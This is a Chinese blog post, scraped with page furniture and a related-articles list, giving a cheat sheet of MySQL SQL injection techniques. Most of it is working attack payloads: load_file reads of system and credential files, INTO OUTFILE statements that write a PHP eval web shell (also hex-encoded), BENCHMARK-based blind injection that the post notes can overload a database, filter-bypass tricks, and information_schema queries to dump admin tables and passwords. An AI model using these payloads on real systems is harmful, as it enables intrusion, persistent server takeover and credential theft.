mysql 注入用例_mysql-常用注入渗透手法

最新推荐文章于 2024-04-10 10:52:12 发布
最新推荐文章于 2024-04-10 10:52:12 发布
阅读量231 收藏
点赞数
文章标签: mysql 注入用例
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42127020/article/details/113224302
版权

mysql:

内置函数常用函数:left(), mid(), ord(),  length(), benchmark(),load_file(), outfile(), concat(),

系统重要信息:system_user(), user(), current_user, session_user(), database(), version(),

ASCII码:select char(97,100,109,105,110 ) 回显:admin

16进制:select 0x61646D696E 回显:admin

注释方法: /*  --

使用 /**/ 或者 + 代替空格

@@datadir 读取数据库路径

@@basedir MYSQL 安装路径

@@version_compile_os 操作系统

load_file:linux,windows写全路径时候,c:/1.txt, /var/www/1.php  路径均为左斜杠 /

c:/windows/php.ini  c:/winnt/php.ini   c:/windows/my.ini //管理员登陆过MYSQL会留下密码和用户名  c:/winnt/my.ini   c:/boot.ini

/etc/password /   /usr/local/httpd/conf/httpd.conf //也许能找到网站默认目录   /usr/local/apache2/conf/httpd.conf //也许能找到网站默认目录哦!FreeBSD下:

load_file(char(47))  列出了此FreeBSD系统的根目录

读不出来的原因:1.权限不够:  and (select count(*) from mysql.user)>0--  如果返回OK,则表示有权限。如果Denied则NO

2.回显长度限制,Substring(load_file(A),0,50),Substring(load_file(A),50,100)一步一步读  3.concat()拼接

outfile:写入条件:1. 未过滤' '  2.权限  3.得到网站物理路径

已经上传了JPG小马,  unionselect 1,load_file( /var/www/xiaoma.jpg),3,4,5,6 into outfile '/var/www/xiaoma.php'/*

直接写入小马,union select 1,'<?php eval($_POST[cmd])?>',3,4,5,6 into outfile '/var/www/xm.php'/*

||

等价于

||

0x3C3F706870206576616C28245F504F53545B636D645D293F3E

数据库导出马:

8f900a89c6347c561fdf2122f13be562.png

961ddebeb323a10fe0623af514929fc1.png

create databaseSupers;useSupers;create table SuperT(code text);insert into SuperT(code) values ("<?php @eval($_POST['cmd']);?>");select * from SuperT intooutfile "D:\\xxx\\shell.php";drop database Supers;

View Code

BENCHMARK:重复执行。不仅可以在display_errors=Off时候,无法判断SQL正确与否。让我们盲注的时候判断技巧。而且可以用来DDOS攻击数据库!

8f900a89c6347c561fdf2122f13be562.png

961ddebeb323a10fe0623af514929fc1.png

id=1 union select 1,benchmark(500000,md5('test')),1 from user where userid=1 and ord(substring(username,1,1))=97 /*UNION SELECT IF(SUBSTRING(user_password,1 ,1) = CHAR(52),BENCHMARK(5000000,md5('test')),null) FROM mb_users WHERE user_group = 1;

View Code

绕过防注入:

id=-255+union+/*!select*/+1,2,3,4    +号代替被顾虑的空格, !

and 1=2 un%ion sel%ect 1,2,3,4,sys%tem_us%er()  %绕过被过滤的SQL语句

爆表:

select 0,0,concat(table_name),0 from (select * from (select * from information_schema.tables where table_schema=16进制database()order by table_schema limit 0,1) t order by table_schema desc)t limit 1-- 爆出第1个表

select 0,0,concat(table_name),0 from (select * from (select * from information_schema.tables where table_schema=16进制database()order by table_schema limit 1,1) t order by table_schema desc)t limit 1-- 爆出第2个表

......爆出所有有用的表后,假如得到admin表: 0x61646D696E

select 0,0,concat(cast(count(*) as char)),0 from information_schema.columns where table_name=0x61646D696Eand table_schema=database() limit 1--  爆出ADMIN表的列数

select 0,0,concat(column_name) from (select * from (select * from information_schema.columns wheretable_name=0x61646D696E and table_schema=database() order by 1 limit 0,1) t order by 1 desc)t limit 1-- 爆出ADMIN表第一个列。即索引为0的列...

root或者足够权限可以爆数据库用户帐户,密码:user password

男爵兔
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
TD用例导入----自定义用例描述1
08-08
———————————————————————————————————————第二步,用例添加基础用例模板添加优先级列—————————————————————
测试用例编写指南----.docx
04-26
"测试用例编写指南" 测试用例编写指南是测试人员在测试设计过程中不可或缺的一份重要指南。该指南旨在使测试人员在测试设计过程中有章可循、有据可依,让测试用例编写规范统一,弥补不同测试人员的知识空缺,进一步...
详细|通过mysql学习sql注入
st3pby的博客
06-08 932
本文来自 【网络安全学习圈】圈内师傅的学习成果,已将其入圈费用返还,如果你也想一块学习,欢迎加入。圈内规划了数个月的学习内容,并提供相应的学习资源和建议,以及一个浓厚的学习氛围。
sql注入(mysql)
m0_73452266的博客
04-20 525
sql注入基础
mysql注入的基本概念及简单示例(小心进局子)
最新发布
m0_75032658的博客
04-10 555
MySQL注入是一种攻击技术,攻击者通过在应用程序的输入字段中插入或“注入”恶意的SQL代码,从而能够执行非授权的数据库操作。这种攻击通常针对那些没有对用户输入进行充分验证或转义的应用程序。下面我将详细说明MySQL注入的操作步骤、类型以及防御措施。
mysql 注入
qq_58970968的博客
07-31 1932
同一个服务器下的不同网站之间的数据库用户有可能是不同的,如果a网站可以有SQL注入,他的用户是root的话就可以实现跨站数据库入侵,去查看网站b下面的数据库;unionselect1,'x',3intooutfile'D\\x.php'--+写入文件‘x’到x.php中;当magic_quotes_gpc=On时,输入数据中含单引号(’)、双引号(”)、反斜线(\)与NULL(NULL字符)等字符,都会被加上反斜线;用来读取数据库下的文件;...
简要MYSQL注入
山兔的博客
03-31 499
SQL注入,一般不是一些低权限的,都会被认为是很严重的漏洞,不是所有的SQL注入都可以对网站后台进行getshell,它是需要条件的,这个条件我们称为权限。有的注入点,它是没有办法进行getshell的,他只能得到一些敏感信息,然后我们在一步步的去获取权限SQL注入的危害有两个,一个是危害到数据,一个是危害到网站的权限,满足条件的注入点就可以,没有这个条件的就不行。
10-mysql数据注入
qq_56414082的博客
03-03 578
以其他字符替换字符串中的一些字符通过str_replace()函数把select这个关键字函数替换成别,让你无法使用//主要如果没有强调大小写,通过更换就可以绕过,还有编码等情况str_replace例:把字符串 “Hello world!php");?
liziqun.zip_测试用例_测试用例 算法_测试用例生成_粒子群 用例_群
09-14
分析了软件测试中测试用例自动生成技术的发展现状和粒子群优化算法的基本原理及实现步骤,并详细研究了几种重要的改进的粒子群优化算法。在此基础上,改进了基本粒子群优化算法,提出了基于改进的粒子群优化算法的测试...
测试用例设计白皮书--边界值分析方法
03-03
通常边界值分析法是作为对等价类划分法的补充,这种情况下,其测试用例来自等价类的边界。2.与等价划分的区别1)边界值分析不是从某等价类中随便挑一个作为代表,而是使这个等价类的每个边界都要作为测试条件。2)边界...
MySQL注入
qq_45031509的博客
04-13 947
mysql注入 1.信息收集 1)操作系统:@@version_compile_cs(不同的系统对数据库操作语句的大小写区分) 2)数据库名:database() 3)数据库用户:user()(专门管理数据库的账户),root为最高权限,容易导致跨站注入数 据。普通用户:只能注入自己网站。 4)数据库版本:version()(选择注入) 5)其他网站路径(进行文件读取,为高权限读取做准备) 2.数据注入 1)低版本(暴力或结合读取查询,表名,列名用猜的方式) 2)高版本(information
mysql注入大全讲解(很详细哦)
07-24
mysql注入大全讲解(很详细哦),可以学习一下啊,比较全面了
什么是MySql注入,怎么防止MySql注入
小道仙的后宫
12-30 975
什么是MySql注入 1、先来看百度百科是怎么说的 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 简单说,就是我们在拼接sql的时候,没有过滤用户的非法sql,导致查询结果和我...
一篇文章弄懂mysql8新特性注入
蚁景网安学院
11-16 917
前言最近打比赛的时候遇到了mysql8的知识点,这里就从环境搭建开始到注入一起一步步慢慢学习。环境搭建我这里是用docker在服务器上拉的,然后用navicat来看的下载docker pu...
浅谈开启magic_quote_gpc后的sql注入攻与防
weixin_34174322的博客
01-14 126
   通过启用php.ini配置文件中的相关选项,就可以将大部分想利用SQL注入漏洞的骇客拒绝于门外。        开启magic_quote_gpc=on之后,能实现addslshes()和stripslashes()这两个函数的功能。在PHP4.0及以上的版本中,该选项默认情况下是开启的,所以在PHP4.0及以上的版本中,就算PHP程序中的参数没有进行过滤,PHP系统也会对每一个通过GET...
php的gpc参数,php.ini中magic_quote_gpc功能on理解_PHP教程
weixin_42135073的博客
04-13 345
开启magic_quote_gpc=on之后,能实现addslshes()和stripslashes()这两个函数的功能。在PHP4.0及以上的版本中,该选项默认情况下是开启的,所以在PHP4.0及以上的版本中,就算PHP程序中的参数没有进行过滤,PHP系统也会对每一个通过GET、POST、COOKIE方式传递的变量自动转换,换句话说,输入的注入攻击代码将会全部被转换,将给攻击者带来非常大的困难。...
常见SQL注入类型 2020-10-04
Lelouch_E的博客
10-05 327
常见SQL注入类型最基础的注入-union注入攻击Boolean注入攻击-布尔盲注报错注入攻击时间注入攻击-时间盲注堆叠查询注入攻击二次注入攻击宽字节注入攻击base64 注入攻击cookie注入攻击-http请求头参数注入XFF注入攻击-http请求头参数注入知道绝对路径的注入 最基础的注入-union注入攻击 判断是get型还是post型注入; 找到正确的闭合规则; order by 查询字段数; union select 1,2…# 查询显示位是第几位,没有的话就试试把id=1显示位让
MySQL常用注入方式总结笔记
EC_Carrot的博客
11-10 879
目录MySQL中的注释获取元数据UNION查询MySQL函数利用MySQL显错式注入宽字节注入MySQL长字符截断延迟注入 MySQL中的注释 MySQL支持以下三种注释风格: #:注释从"#"字符到行尾 --:注释从"--"序列到行尾。需要注意用此注释后面需要跟一个或多个空格。注:空格与tag都可以 /* */:注释从/*序列到后面*/序列中间的字符 其中,/* */注释有个特点,观察以下sql语句: select id/*!55555, username*/ from users 这句语句是能正常
mysql注入有哪些方式_MYSQL注入主要有哪些分类
weixin_35976993的博客
02-02 436
MYSQL注入主要有哪些分类发布时间:2020-05-25 17:01:32来源:51CTO阅读:116作者:三月下面讲讲关于MYSQL注入主要有哪些分类,文字的奥妙在于贴近主题相关。所以,闲话就不谈了,我们直接看下文吧,相信看完MYSQL注入主要有哪些分类这篇文章你一定会有所受益。Mysql注入分类:1.基于错误的有显示位的注入(联合注入)(1)判断注入and 1=1,http://127.0....
解释下面这段代码:@pytest.fixture(autouse=True, scope="class") def test1(): print("\n 开始执行class") # 测试用例 def test_a(): print('---用例a执行---') def test_d(): print('---用例d执行---') class Test_Case: def test_b(self): print('---用例b执行---') def test_c(self): print('---用例c执行---') if name == 'main': pytest.main(['-s', 'test_02_auto_scope.py'])
06-13
它包含了一个测试用例和一个测试类,以及一个pytest的fixture。 - pytest.fixture(autouse=True, scope="class"):这是一个pytest的fixture,用于在测试脚本执行前进行一些准备工作。其中,autouse=True表示这个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值